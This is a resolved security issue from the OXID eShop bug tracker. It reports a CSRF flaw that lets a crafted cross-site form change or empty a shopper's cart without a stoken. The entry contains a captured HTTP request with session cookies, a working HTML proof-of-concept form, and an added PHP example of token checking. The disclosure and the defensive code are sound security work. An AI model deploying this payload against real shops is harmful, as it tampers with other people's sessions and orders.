View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0006674 | OXID eShop (all versions) | 4.04. Security | public | 2017-08-02 13:05 | 2017-08-18 15:39 |
Reporter | marco_steinhaeuser | Assigned To | |||
Priority | normal | Severity | minor | Reproducibility | always |
Status | resolved | Resolution | fixed | ||
Product Version | 4.10.5 / 5.3.5 | ||||
Target Version | 4.10.6 / 5.3.6 | Fixed in Version | 4.9.10 / 5.2.10 | ||
Summary | 0006674: OXID potential CSRF bug | ||||
Tags | No tags attached. | ||||
Theme | Not defined | ||||
Browser | Not defined | ||||
PHP Version | Not defined | ||||
Database Version | Not defined | ||||

Description:

Oxid Security Team,

We received a report of a CSRF bug on our site `[domain.com]`. The gist is that a carefully crafted form can adjust cart item counts without a valid stoken or CSRF protection mechanism. This is admittedly minor, but represents a valid security problem. This could admittedly be a known issue that could be solved by updates, but we would like to confirm that this problem is known about and has been addressed.

-Daryl
iFixit Security Team

PS: Please find the original report included:

------------------------------------------------------------------

1. CSRF on the EU Store:

I just need "aid", which is always the same for the victim as well. Suppose that I somehow came to know the product name which is in the cart; then I easily get the aid value by searching the product and intercepting my own request, and use it in my CSRF code.

Here is the POST request for the product that I want to search to find "aid":

```http
POST /index.php?lang=1& HTTP/1.1
Host: [domain.com]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Referer: https://[domain.com]/index.php?cl=details&cnid=699a66f8a4ded03b5795313fdf6281fa&anid=04832587843313ab35bf29aaab5f2ab3&listtype=search&searchparam=iphone&&lang=1
Cookie: _ga=GA1.2.532387267.1494626478; session=2b0d5cf9090fc367f6ce8753e4d4edf1; settingsc=current_page%3D%252FUser%252Feu_sso%3A%3Alast_page%3D%252FGuide%252FUser%252Fdozuki_sso; __utmx=120539472.yt3Er6fYT5-YKEiDeCa0zQ$0:0; __utmxx=120539472.yt3Er6fYT5-YKEiDeCa0zQ$0:1494630243:8035200; _gid=GA1.2.120962297.1497571472; _ceg.s=ormp2a; _ceg.u=ormp2a; language=1; sid=1f446ae471b83173539929786a3ed2a3; sid_key=oxid
Connection: keep-alive
Upgrade-Insecure-Requests: 1

stoken=3614313A&lang=1&cnid=699a66f8a4ded03b5795313fdf6281fa&listtype=search&actcontrol=details&searchparam=iphone&cl=details&aid=04832587843313ab35bf29aaab5f2ab3&anid=04832587843313ab35bf29aaab5f2ab3&parentid=0482063b7baac91cda48cf68bb0c660d&panid=&fnc=tobasket&varselid%5B0%5D=e90dfb84e30edf611e326eeb04d680de&am=1
```

In this I only need aid, which is the same for the victim as well. I only need to change the aid in my CSRF code, and there is no need of any token. And now I am gonna send this file to the victim, and his/her cart got empty. Here is the CSRF code for that:

```html
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="https://[domain.com]/index.php">
      <input type="hidden" name="lang" value="1" />
      <input type="hidden" name="cl" value="basket" />
      <input type="hidden" name="fnc" value="changebasket" />
      <input type="hidden" name="override" value="1" />
      <input type="hidden" name="aid" value="04832587843313ab35bf29aaab5f2ab3" />
      <input type="hidden" name="am" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
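The report boils down to `fnc=changebasket` being honoured with no `stoken` at all, from a plain GET form on another origin. As an added illustration (not OXID's own code) of the server-side check that closes that gap: a random token bound to the session, compared in constant time, with the state-changing function refused unless it arrives by POST carrying that token. The function names, the `$_SESSION` layout and the sample `aid` value are assumptions.

```php
<?php
// Added illustration, not OXID eShop code. Assumed names: csrf_token(),
// csrf_check(), handle_basket_request(); session layout is made up.
session_start();

// One random token per session; every basket form must embed it as "stoken".
function csrf_token(): string
{
    if (empty($_SESSION['stoken'])) {
        $_SESSION['stoken'] = bin2hex(random_bytes(16));
    }
    return $_SESSION['stoken'];
}

// Constant-time comparison of the submitted token against the session token.
function csrf_check(?string $submitted): bool
{
    return is_string($submitted)
        && !empty($_SESSION['stoken'])
        && hash_equals($_SESSION['stoken'], $submitted);
}

// Dispatch for cl=basket: changebasket modifies state, so it is accepted only
// via POST and only with a valid stoken; the basket is untouched otherwise.
function handle_basket_request(string $method, array $params): string
{
    if (($params['fnc'] ?? '') !== 'changebasket') {
        return 'ok: read-only basket view';
    }
    if ($method !== 'POST') {
        return 'rejected: changebasket requires POST';
    }
    if (!csrf_check($params['stoken'] ?? null)) {
        return 'rejected: missing or invalid stoken';
    }
    $aid = $params['aid'] ?? '';
    $am  = (int)($params['am'] ?? 0);
    $_SESSION['basket'][$aid] = $am;   // am=0 drops the article from the cart
    return "ok: article {$aid} amount set to {$am}";
}

// The cross-site form from the report: a GET with no stoken. Refused before
// the basket is touched. The aid value here is constructed, not a real one.
$poc = ['lang' => '1', 'cl' => 'basket', 'fnc' => 'changebasket',
        'override' => '1', 'aid' => 'constructed-aid', 'am' => '0'];
echo handle_basket_request('GET', $poc), "\n";

// A same-origin form that carries the session token is honoured.
echo handle_basket_request('POST', $poc + ['stoken' => csrf_token()]), "\n";
```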